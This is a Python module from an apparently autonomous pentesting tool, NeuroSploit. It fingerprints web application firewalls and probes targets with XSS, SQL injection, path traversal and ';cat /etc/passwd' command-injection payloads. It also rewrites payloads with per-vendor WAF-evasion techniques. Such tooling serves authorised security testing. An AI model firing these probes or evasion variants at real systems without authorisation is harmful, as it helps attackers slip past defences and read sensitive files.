Files
NeuroSploit/backend/core/waf_detector.py
2026-02-11 10:47:33 -03:00

534 lines
18 KiB
Python

"""
NeuroSploit v3 - WAF Detector
WAF fingerprinting, bypass strategy database, and payload adaptation
for autonomous pentesting. Detects 15+ WAF vendors and provides
per-WAF bypass techniques.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
# Module-level logger named after this module; used for the debug/info
# messages emitted during WAF detection.
logger = logging.getLogger(__name__)
@dataclass
class WAFMatch:
    """A single WAF identified from an HTTP response.

    Instances are produced by the signature check and collected in
    ``WAFResult.detected_wafs``.
    """

    # Signature key of the WAF, e.g. "cloudflare", "aws_waf".
    name: str
    # Accumulated signature score, capped to the range 0.0-1.0.
    confidence: float
    # How the WAF was spotted: "header", "body", "server" or "probe".
    detection_method: str
    # Comma-separated list of the signatures that matched.
    evidence: str
@dataclass
class WAFResult:
    """Complete WAF detection result for one target."""

    # WAFs that matched at least one signature.
    detected_wafs: List["WAFMatch"] = field(default_factory=list)
    # Probe type ("xss", "sqli", ...) -> whether that probe was blocked.
    blocking_patterns: Dict[str, bool] = field(default_factory=dict)
    # Suggested pause between requests, in seconds.
    recommended_delay: float = 0.1
# Fingerprint database: WAF name -> signature lists.
#   "headers": response header names whose presence indicates the WAF
#   "body":    substrings looked for in the (lower-cased) response body
#   "server":  substrings looked for in the (lower-cased) Server header
WAF_SIGNATURES = {
    "cloudflare": {
        "headers": ["cf-ray", "cf-request-id", "cf-cache-status"],
        "body": ["cloudflare", "ray id:", "error 1020", "error 1015"],
        "server": ["cloudflare"],
    },
    "aws_waf": {
        "headers": ["x-amzn-requestid", "x-amzn-errortype"],
        "body": ["request blocked", "aws waf"],
        "server": ["cloudfront", "amazons3"],
    },
    "akamai": {
        "headers": ["x-akamai-session-info", "akamai-origin-hop"],
        "body": ["akamai", "ghost"],
        "server": ["akamaighost"],
    },
    "imperva": {
        "headers": ["x-iinfo", "x-cdn"],
        "body": ["imperva", "incapsula incident", "incapsula"],
        "server": ["imperva"],
    },
    "modsecurity": {
        "headers": ["x-denied-reason", "x-modsecurity"],
        "body": ["mod_security", "modsecurity", "noyb"],
        "server": [],
    },
    "f5_bigip": {
        "headers": ["x-waf-status", "x-cnection"],
        "body": ["the requested url was rejected"],
        "server": ["big-ip", "bigip", "f5"],
    },
    "sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body": ["sucuri", "sucuri website firewall", "cloudproxy"],
        "server": ["sucuri"],
    },
    "barracuda": {
        "headers": ["barra_counter_session"],
        "body": ["barracuda", "barracuda networks"],
        "server": [],
    },
    "fortinet": {
        "headers": ["x-fw-server"],
        "body": ["fortigate", "fortiweb", "fortinet"],
        "server": ["fortiweb"],
    },
    "citrix": {
        "headers": ["citrix-transactionid", "cneonction", "nncoection"],
        "body": ["citrix", "netscaler appfw"],
        "server": ["netscaler"],
    },
    "azure_waf": {
        "headers": ["x-azure-ref", "x-ms-forbidden-ip"],
        "body": ["azure application gateway", "azure front door"],
        "server": ["microsoft-azure-application-gateway"],
    },
    "gcp_armor": {
        "headers": ["x-cloud-trace-context"],
        "body": ["google cloud armor", "forbidden by security policy"],
        "server": ["google frontend", "gfe"],
    },
    "wordfence": {
        "headers": [],
        "body": [
            "wordfence",
            "generated by wordfence",
            "this response was generated by wordfence",
        ],
        "server": [],
    },
    "cloudfront": {
        "headers": ["x-amz-cf-id", "x-amz-cf-pop"],
        "body": ["cloudfront", "error from cloudfront"],
        "server": ["cloudfront"],
    },
    "fastly": {
        "headers": ["x-fastly-request-id", "fastly-restarts"],
        "body": ["fastly error"],
        "server": ["fastly"],
    },
    "reblaze": {
        "headers": ["rbzid"],
        "body": ["reblaze", "access denied (rbz)"],
        "server": ["reblaze"],
    },
}
# Evasion playbook: WAF name -> bypass configuration.
#   "xss" / "sqli": ordered technique names, resolved to implementations by
#                   WAFDetector._apply_technique
#   "general":      request pacing ("delay") and optional extra "headers"
# The "generic" entry is the fallback for WAFs without a dedicated entry.
BYPASS_STRATEGIES = {
    "cloudflare": {
        "xss": [
            "unicode_escape",       # \u003cscript\u003e
            "svg_payload",          # <svg onload=...>
            "comment_injection",    # <scr<!---->ipt>
            "case_mixing",          # <ScRiPt>
            "html_entity",          # &#x3c;script&#x3e;
        ],
        "sqli": [
            "inline_comment",       # /*!50000UNION*/
            "case_mixing",          # uNiOn SeLeCt
            "whitespace_variant",   # UNION%0bSELECT
            "scientific_notation",  # 1e0UNION
        ],
        "general": {
            "delay": 0.3,
            "headers": {"X-Forwarded-For": "127.0.0.1"},
        },
    },
    "modsecurity": {
        "xss": ["inline_comment", "case_mixing", "whitespace_variant", "null_byte"],
        "sqli": [
            "inline_comment",       # /*!50000OR*/
            "case_mixing",
            "double_encoding",      # %2527
            "whitespace_variant",   # tab, newline, %0a
        ],
        "general": {"delay": 0.2},
    },
    "aws_waf": {
        "xss": ["double_encoding", "null_byte", "unicode_escape", "svg_payload"],
        "sqli": [
            "double_encoding",      # %253C = <
            "null_byte",            # \x00
            "scientific_notation",  # 1e0=1
            "concat_function",      # CONCAT(0x27,...)
        ],
        "general": {"delay": 0.2},
    },
    "imperva": {
        "xss": ["unicode_escape", "html_entity", "svg_payload", "comment_injection"],
        "sqli": ["inline_comment", "hex_encoding", "whitespace_variant"],
        "general": {"delay": 0.5},
    },
    "generic": {
        "xss": ["case_mixing", "unicode_escape", "svg_payload", "html_entity"],
        "sqli": ["inline_comment", "case_mixing", "whitespace_variant"],
        "general": {
            "delay": 0.3,
            "headers": {"X-Forwarded-For": "127.0.0.1"},
        },
    },
}
class WAFDetector:
    """WAF fingerprinting and bypass strategy engine.

    The optional ``request_engine`` must expose an awaitable
    ``request(url, method=...)`` whose result has ``headers``, ``body`` and
    ``status`` attributes. Without an engine, ``detect`` performs no requests
    and returns an empty result.

    Usage:
        detector = WAFDetector(request_engine)
        result = await detector.detect(url)
        if result.detected_wafs:
            adapted = detector.adapt_payload(payload, waf_name, vuln_type)
    """

    # Probe payloads that trigger WAF responses
    PROBE_PAYLOADS = {
        "xss": "<script>alert(1)</script>",
        "sqli": "' OR 1=1--",
        "lfi": "../../etc/passwd",
        "rce": ";cat /etc/passwd",
    }

    # Response statuses interpreted as "the probe was blocked".
    _BLOCK_STATUSES = (403, 406, 429, 501)

    # Upper bound on the number of variants returned by adapt_payload.
    _MAX_VARIANTS = 8

    # Technique name (as used in BYPASS_STRATEGIES) -> implementing method.
    _TECHNIQUES = {
        "unicode_escape": "_unicode_escape",
        "case_mixing": "_case_mix",
        "double_encoding": "_double_encode",
        "null_byte": "_null_byte",
        "comment_injection": "_comment_inject",
        "inline_comment": "_inline_comment",
        "whitespace_variant": "_whitespace_variant",
        "svg_payload": "_svg_variant",
        "html_entity": "_html_entity",
        "scientific_notation": "_scientific_notation",
        "hex_encoding": "_hex_encode",
        "concat_function": "_concat_function",
    }

    # Single-pass character substitution tables.
    _UNICODE_ESCAPES = str.maketrans({
        "<": "\\u003c", ">": "\\u003e", "'": "\\u0027",
        '"': "\\u0022", "/": "\\u002f",
    })
    _HTML_ENTITIES = str.maketrans({
        "<": "&#60;", ">": "&#62;", "'": "&#39;",
        '"': "&#34;", "/": "&#47;",
    })
    _NULL_BYTE_PREFIXES = str.maketrans({
        "<": "%00<", "'": "%00'", '"': '%00"',
    })

    # URL-encoded tab and newline, alternated when replacing spaces.
    _SPACE_SUBSTITUTES = ("%09", "%0a")

    # Patterns shared by the technique implementations.
    _SQL_KEYWORD_RE = re.compile(
        r"\b(?:UNION|SELECT|OR|AND|FROM|WHERE)\b", re.IGNORECASE
    )
    _SCRIPT_TAG_RE = re.compile(r"(</?scr)(ipt)", re.IGNORECASE)
    _JS_CALL_RE = re.compile(r"(?:alert|confirm|prompt)\([^)]*\)")
    _SCI_NOTATION_RE = re.compile(r"(\d+)\s+(OR|AND|UNION)", re.IGNORECASE)
    _SQL_STRING_RE = re.compile(r"'([^']+)'")

    def __init__(self, request_engine=None):
        """Store the request engine and start with an empty result cache."""
        self.request_engine = request_engine
        self._cache: Dict[str, WAFResult] = {}  # host (netloc) -> result

    async def detect(self, url: str) -> "WAFResult":
        """Detect WAFs on the target URL.

        Phase 1: Passive detection (headers/body from a normal response).
        Phase 2: Active probing (send trigger payloads, analyze blocks).

        Results are cached per host; a cached result is returned without
        issuing any request. Request failures are logged at debug level and
        otherwise ignored, so detection is best-effort.

        Args:
            url: Target URL to fingerprint.

        Returns:
            The detection result, including which probe types were blocked
            and the recommended delay between requests.
        """
        from urllib.parse import urlparse

        # Scheme-less URLs have an empty netloc; key those by the URL itself
        # so unrelated targets do not share one cache slot.
        host = urlparse(url).netloc or url
        cached = self._cache.get(host)
        if cached is not None:
            return cached

        detected: List[WAFMatch] = []
        blocking: Dict[str, bool] = {}

        if self.request_engine:
            # Phase 1: Passive detection from baseline request
            try:
                baseline = await self.request_engine.request(url, method="GET")
                if baseline:
                    detected.extend(self._check_signatures(
                        baseline.headers, baseline.body, baseline.status
                    ))
            except Exception as e:
                logger.debug("WAF passive detection error: %s", e)

            # Phase 2: Active probing
            known = {match.name for match in detected}
            for probe_type, payload in self.PROBE_PAYLOADS.items():
                try:
                    response = await self.request_engine.request(
                        self._build_probe_url(url, payload), method="GET"
                    )
                    if not response:
                        continue
                    if response.status not in self._BLOCK_STATUSES:
                        blocking[probe_type] = False
                        continue
                    blocking[probe_type] = True
                    # A block page often carries signatures the baseline
                    # response did not; record only WAFs not already seen.
                    for match in self._check_signatures(
                        response.headers, response.body, response.status
                    ):
                        if match.name not in known:
                            match.detection_method = "probe"
                            detected.append(match)
                            known.add(match.name)
                except Exception as e:
                    logger.debug("WAF probe '%s' failed: %s", probe_type, e)

        # Determine recommended delay from the first (primary) detected WAF
        delay = 0.1
        if detected:
            strategy = BYPASS_STRATEGIES.get(
                detected[0].name, BYPASS_STRATEGIES["generic"]
            )
            delay = strategy.get("general", {}).get("delay", 0.3)

        waf_result = WAFResult(
            detected_wafs=detected,
            blocking_patterns=blocking,
            recommended_delay=delay,
        )
        self._cache[host] = waf_result

        if detected:
            waf_names = ", ".join(
                f"{w.name}({w.confidence:.0%})" for w in detected
            )
            logger.info("WAF detected on %s: %s", host, waf_names)
        return waf_result

    @staticmethod
    def _build_probe_url(url: str, payload: str) -> str:
        """Return ``url`` with a URL-encoded ``test=<payload>`` parameter.

        The parameter is appended to any existing query string and placed
        before the fragment, so the result stays a well-formed URL.
        """
        from urllib.parse import quote, urlsplit, urlunsplit

        parts = urlsplit(url)
        probe_param = "test=" + quote(payload, safe="")
        query = f"{parts.query}&{probe_param}" if parts.query else probe_param
        return urlunsplit(parts._replace(query=query))

    def _check_signatures(
        self,
        headers: Dict[str, str],
        body: str,
        status: int,
    ) -> List["WAFMatch"]:
        """Check a response against the WAF signature database.

        Each matching header adds 0.4, each body substring 0.3 and each
        Server-header substring 0.5 to the confidence, capped at 1.0. Only
        the first 5000 characters of the body are inspected.

        Args:
            headers: Response headers; ``None`` is treated as empty.
            body: Response body; ``None`` is treated as empty and bytes are
                decoded as UTF-8 with replacement.
            status: Response status code (currently unused).

        Returns:
            Matches sorted by descending confidence.
        """
        if isinstance(body, (bytes, bytearray)):
            body = bytes(body).decode("utf-8", errors="replace")
        headers_lower = {
            str(k).lower(): str(v).lower() for k, v in (headers or {}).items()
        }
        body_lower = (body or "")[:5000].lower()
        server = headers_lower.get("server", "")

        matches: List[WAFMatch] = []
        for waf_name, sigs in WAF_SIGNATURES.items():
            evidence_parts = []
            confidence = 0.0
            header_hit = server_hit = False

            for h in sigs.get("headers", []):
                if h.lower() in headers_lower:
                    evidence_parts.append(f"header:{h}")
                    confidence += 0.4
                    header_hit = True
            for b in sigs.get("body", []):
                if b.lower() in body_lower:
                    evidence_parts.append(f"body:{b}")
                    confidence += 0.3
            for s in sigs.get("server", []):
                if s.lower() in server:
                    evidence_parts.append(f"server:{s}")
                    confidence += 0.5
                    server_hit = True

            if not evidence_parts:
                continue

            # Report the strongest kind of evidence that was found.
            if header_hit:
                method = "header"
            elif server_hit:
                method = "server"
            else:
                method = "body"

            matches.append(WAFMatch(
                name=waf_name,
                confidence=min(1.0, confidence),
                detection_method=method,
                evidence=", ".join(evidence_parts),
            ))

        # Sort by confidence
        matches.sort(key=lambda m: m.confidence, reverse=True)
        return matches

    def get_bypass_strategy(self, waf_name: str, vuln_type: str) -> Dict:
        """Get the bypass strategy for a WAF + vuln type combination.

        Unknown WAF names fall back to the "generic" strategy.

        Returns:
            A dict with "techniques" (list of technique names), "delay"
            (seconds) and "extra_headers". The containers are copies, so
            callers may modify them without affecting the strategy database.
        """
        strategies = BYPASS_STRATEGIES.get(waf_name, BYPASS_STRATEGIES["generic"])
        category = self._vuln_to_category(vuln_type)
        techniques = strategies.get(category, strategies.get("xss", []))
        general = strategies.get("general", {})
        return {
            "techniques": list(techniques),
            "delay": general.get("delay", 0.3),
            "extra_headers": dict(general.get("headers", {})),
        }

    def adapt_payload(
        self, payload: str, waf_name: str, vuln_type: str
    ) -> List[str]:
        """Generate bypass variants of a payload for a specific WAF.

        Returns:
            Up to 8 distinct variants, in strategy order. Variants equal to
            the original payload are dropped and the original itself is not
            included, so the list may be empty.
        """
        strategy = self.get_bypass_strategy(waf_name, vuln_type)
        variants = (
            self._apply_technique(payload, technique, vuln_type)
            for technique in strategy.get("techniques", [])
        )
        useful = [v for v in variants if v and v != payload]
        # dict.fromkeys deduplicates while preserving first-seen order.
        return list(dict.fromkeys(useful))[:self._MAX_VARIANTS]

    def _vuln_to_category(self, vuln_type: str) -> str:
        """Map a specific vuln type to a WAF bypass category.

        SQL/NoSQL injection types map to "sqli"; everything else, including
        unknown types, maps to the default category "xss".
        """
        sqli_types = {"sqli_error", "sqli_blind", "sqli_union", "sqli_time",
                      "sqli", "nosql_injection"}
        return "sqli" if vuln_type in sqli_types else "xss"

    def _apply_technique(self, payload: str, technique: str, vuln_type: str) -> Optional[str]:
        """Apply a named bypass technique to a payload.

        Returns:
            The transformed payload, or ``None`` when the technique is
            unknown or its implementation raised (logged at debug level).
            ``vuln_type`` is accepted for interface compatibility and is
            not used.
        """
        method_name = self._TECHNIQUES.get(technique)
        if method_name is None:
            return None
        try:
            return getattr(self, method_name)(payload)
        except Exception as e:
            logger.debug("Bypass technique '%s' failed: %s", technique, e)
            return None

    # --- Bypass technique implementations ---

    def _unicode_escape(self, payload: str) -> str:
        """Replace <, >, quotes and / with \\uXXXX escapes."""
        return payload.translate(self._UNICODE_ESCAPES)

    def _case_mix(self, payload: str) -> str:
        """Alternate letter case: <ScRiPt>, uNiOn SeLeCt.

        Non-letters are copied through and do not advance the alternation.
        """
        result = []
        upper = True
        for c in payload:
            if c.isalpha():
                result.append(c.upper() if upper else c.lower())
                upper = not upper
            else:
                result.append(c)
        return "".join(result)

    def _double_encode(self, payload: str) -> str:
        """Double URL-encode the payload (e.g. < becomes %253C)."""
        from urllib.parse import quote

        # Percent-encode once, then encode the resulting % signs.
        return quote(payload, safe="").replace("%", "%25")

    def _null_byte(self, payload: str) -> str:
        """Insert an encoded null byte (%00) before <, ' and "."""
        return payload.translate(self._NULL_BYTE_PREFIXES)

    def _comment_inject(self, payload: str) -> str:
        """Split script tags with an HTML comment: <script> -> <scr<!---->ipt>.

        Matches opening and closing tags in any letter case, with or
        without attributes.
        """
        return self._SCRIPT_TAG_RE.sub(r"\1<!---->\2", payload)

    def _inline_comment(self, payload: str) -> str:
        """SQL inline comment bypass: UNION -> /*!50000UNION*/.

        Keywords are matched case-insensitively as whole words and emitted
        in upper case.
        """
        return self._SQL_KEYWORD_RE.sub(
            lambda m: f"/*!50000{m.group(0).upper()}*/", payload
        )

    def _whitespace_variant(self, payload: str) -> str:
        """Replace every space with alternating %09 (tab) and %0a (newline)."""
        subs = self._SPACE_SUBSTITUTES
        head, *rest = payload.split(" ")
        out = [head]
        for index, chunk in enumerate(rest):
            out.append(subs[index % len(subs)])
            out.append(chunk)
        return "".join(out)

    def _svg_variant(self, payload: str) -> str:
        """Convert an XSS payload to an SVG onload payload.

        Reuses the first alert/confirm/prompt call found in the payload, or
        falls back to a fixed alert(1) payload when there is none.
        """
        found = self._JS_CALL_RE.search(payload)
        if not found:
            return '<svg/onload=alert(1)>'
        js_code = found.group(0)
        # Pick an attribute delimiter that does not occur in the JS code.
        if '"' not in js_code:
            return f'<svg onload="{js_code}">'
        if "'" not in js_code:
            return f"<svg onload='{js_code}'>"
        escaped = js_code.replace('"', "&quot;")
        return f'<svg onload="{escaped}">'

    def _html_entity(self, payload: str) -> str:
        """Encode <, >, quotes and / as decimal HTML entities."""
        return payload.translate(self._HTML_ENTITIES)

    def _scientific_notation(self, payload: str) -> str:
        """Use scientific notation for SQL: 1 OR -> 1e0OR."""
        return self._SCI_NOTATION_RE.sub(r"\1e0\2", payload)

    def _hex_encode(self, payload: str) -> str:
        """Replace single-quoted SQL string literals with 0x hex literals."""
        return self._SQL_STRING_RE.sub(
            lambda m: "0x" + m.group(1).encode().hex(), payload
        )

    def _concat_function(self, payload: str) -> str:
        """Rebuild single-quoted SQL strings as CONCAT(CHAR(n),...)."""
        def concat_str(match):
            chars = ",".join(f"CHAR({ord(c)})" for c in match.group(1))
            return f"CONCAT({chars})"
        return self._SQL_STRING_RE.sub(concat_str, payload)